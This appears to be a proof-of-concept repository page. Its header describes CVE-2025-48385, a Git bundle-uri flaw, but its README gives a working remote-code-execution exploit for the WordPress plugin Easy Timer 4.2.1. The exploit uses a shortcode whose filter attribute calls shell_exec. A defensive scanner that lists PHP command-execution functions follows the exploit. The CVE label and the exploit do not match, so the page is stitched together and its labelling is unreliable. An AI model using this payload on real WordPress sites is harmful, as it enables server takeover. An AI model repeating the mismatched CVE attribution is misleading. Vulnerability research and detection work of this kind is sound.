
CVE-2025-48385 PoC — Git allows arbitrary file writes via bundle-uri parameter injection

Associated Vulnerability
Title: Git allows arbitrary file writes via bundle-uri parameter injection (CVE-2025-48385)
Description: Git is a fast, scalable, distributed revision control system with an unusually rich command set that provides both high-level operations and full access to internals. When cloning a repository, Git can optionally fetch a bundle advertised by the remote server, which allows the server side to offload parts of the clone to a CDN. The Git client does not sufficiently validate the advertised bundles, which allows the remote side to perform protocol injection. This protocol injection can cause the client to write the fetched bundle to a location controlled by the adversary. The fetched content is fully controlled by the server, which can in the worst case lead to arbitrary code execution. The use of bundle URIs is not enabled by default and is controlled by the bundle.heuristic config option. Some cases of the vulnerability require that the adversary controls where a repository will be cloned to; this requires either social engineering or a recursive clone with submodules, so these cases can be avoided by disabling recursive clones. This vulnerability is fixed in v2.43.7, v2.44.4, v2.45.4, v2.46.4, v2.47.3, v2.48.2, v2.49.1, and v2.50.1.
Readme
# Easy Timer v4.2.1

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress
```

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory, execute the following command:

```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(Note: replace these with your own choice of user name, email and password.)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post**; the shortcode runs the command when the post renders.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congrats, you have RCE: the command output is rendered in the post preview.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />
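As a defender-side check added here (this is not part of the original PoC, nor code from the Easy Timer plugin), the following Python script scans exported post content for `countdown` shortcodes that carry a `filter` attribute. Any `filter` value naming a PHP command-execution function is reported as critical; any other non-allowlisted value is flagged for review. The allowlist `SAFE_FILTERS` and the sample posts are constructed for this example and are assumptions, not values taken from the plugin.

```python
import re

# Hypothetical allowlist of filter values an administrator has reviewed.
# Constructed for this example; not derived from the plugin's own code.
SAFE_FILTERS = {"strtoupper", "strtolower", "ucfirst"}

# PHP functions that execute OS commands. A countdown shortcode whose
# `filter` attribute names one of these is the RCE pattern shown above.
CODE_EXEC_CALLABLES = {
    "shell_exec", "exec", "system", "passthru", "popen", "proc_open",
}

# Matches [countdown ...attrs...]body[/countdown]; attrs stop at the first ']'.
SHORTCODE_RE = re.compile(
    r"\[countdown\b([^\]]*)\](.*?)\[/countdown\]", re.DOTALL | re.IGNORECASE
)
# Matches name="value", name='value' or an unquoted name=value pair.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""")


def parse_attrs(raw):
    """Return the shortcode attributes as a dict with lower-cased names."""
    attrs = {}
    for m in ATTR_RE.finditer(raw):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def scan_post(post_id, content):
    """Return a list of findings for every suspicious countdown shortcode."""
    findings = []
    for m in SHORTCODE_RE.finditer(content):
        attrs = parse_attrs(m.group(1))
        if "filter" not in attrs:
            continue  # plain timer, no callable involved
        filt = attrs["filter"].strip().lower()
        if filt in CODE_EXEC_CALLABLES:
            severity = "critical"
        elif filt not in SAFE_FILTERS:
            severity = "review"
        else:
            continue
        findings.append({
            "post_id": post_id,
            "severity": severity,
            "filter": filt,
            "body": m.group(2).strip(),
        })
    return findings


def scan_posts(posts):
    """Scan dicts shaped like `wp post list --fields=ID,post_content --format=json`."""
    findings = []
    for post in posts:
        findings.extend(scan_post(post["ID"], post["post_content"]))
    return findings


# Constructed sample export: one benign timer, the payload from the PoC above,
# one allowlisted filter and one single-quoted command-execution filter.
SAMPLE_POSTS = [
    {"ID": 1, "post_content": "[countdown date=2025/12/17-00:00:00]Launch[/countdown]"},
    {"ID": 2, "post_content": '[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]'},
    {"ID": 3, "post_content": '<p>[countdown date=2026/01/01-00:00:00 filter="strtoupper"]soon[/countdown]</p>'},
    {"ID": 4, "post_content": "[countdown date=2026/01/01-00:00:00 filter='passthru']id[/countdown]"},
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"post {f['post_id']}: {f['severity']} filter={f['filter']!r} body={f['body']!r}")
```

In a real deployment, feed the script the JSON produced by `wp post list --fields=ID,post_content --format=json` (and the same for revisions and pages) so that every post with an editor-planted `filter` attribute is found; pair this with removing or updating the plugin and reviewing which accounts hold the Editor role.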
## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />
* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).
* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the database container to finish initializing, then reload the page.

File Snapshot

[4.0K] /data/pocs/73272bf67c1789f88d7365ccbf74c20873077216
├── [1.1K] docker-compose.yml
└── [2.3K] README.md

1 directory, 2 files